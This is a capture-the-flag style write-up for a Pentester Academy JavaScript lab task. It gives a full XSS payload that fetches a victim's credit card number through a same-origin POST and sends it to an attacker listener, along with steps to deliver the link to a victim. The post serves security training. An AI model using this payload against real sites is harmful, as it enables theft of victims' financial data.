Javascript for Pentester Task 15

Hello pentesters, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. In this task we learn how to use XMLHttpRequest to fetch data and post it to the attacker on the go, without the user noticing anything. You can view solutions to the other tasks here.

Task 15: Data Exfiltration with XMLHttpRequest | TASK LINK

The task is to find John's credit card number using an XSS vulnerability on the page. This task is of moderate level; you need to know the XMLHttpRequest API, its syntax and how to use it (open, setRequestHeader, send and the onreadystatechange callback).
The injection point is the same as in the previous tasks, the url parameter; you can apply some test injections to verify that. While viewing the source code you will see this comment: "Credit Card can be obtained via a POST request to /lab/webapp/jfp/15/cardstore with params user=john". It was probably left by the developer. So you have to send a POST request with the "user" parameter set to "john". Because the injected script runs inside the vulnerable page's origin, that POST is a same-origin request and carries the victim's session cookies, which is exactly why XSS lets us read data the attacker could not request directly.

var req1 = new XMLHttpRequest();
req1.onreadystatechange = function(){
    if (this.readyState == 4 && this.status == 200) {
        var data = this.responseText;  // the card number returned by /cardstore
        var req2 = new XMLHttpRequest();  // forward it to the attacker's listener
        req2.open('GET', 'http://localhost:8000/f?' + encodeURIComponent(data), true);
        req2.send();
    }
};
req1.open('POST', '/lab/webapp/jfp/15/cardstore', true);  // same origin as the victim page, so cookies go along
req1.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
req1.send("user=john");

This code creates an XMLHttpRequest (req1) to the endpoint from the comment, sending user=john as a form-encoded POST body. When the response arrives (readyState 4, status 200), the response text is stored in the variable "data" and a second XMLHttpRequest (req2) sends that "data" to our attacker server as the query string of a GET request. The data is passed through encodeURIComponent so spaces or other special characters in the card number survive the trip. The browser sends this cross-origin GET even though the attacker's server sets no CORS headers; CORS only stops the script from reading the response, and we do not need to read it, because the card number is already in the listener's access log. Again in this case you can run Python's built-in HTTP server module to catch the request (python3 -m http.server 8000, or python -m SimpleHTTPServer 8000 on Python 2); the card number shows up in the request line it logs. Copy and URL-encode the code, paste it after the 'url' parameter on the same page and send the link to the victim; when the victim opens the page, the credit card details are sent to the attacker machine. Note that localhost:8000 only works because the lab runs attacker and victim on the same host; in a real engagement you would replace it with a host you control.
Refer to this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided on the Pentester Academy website.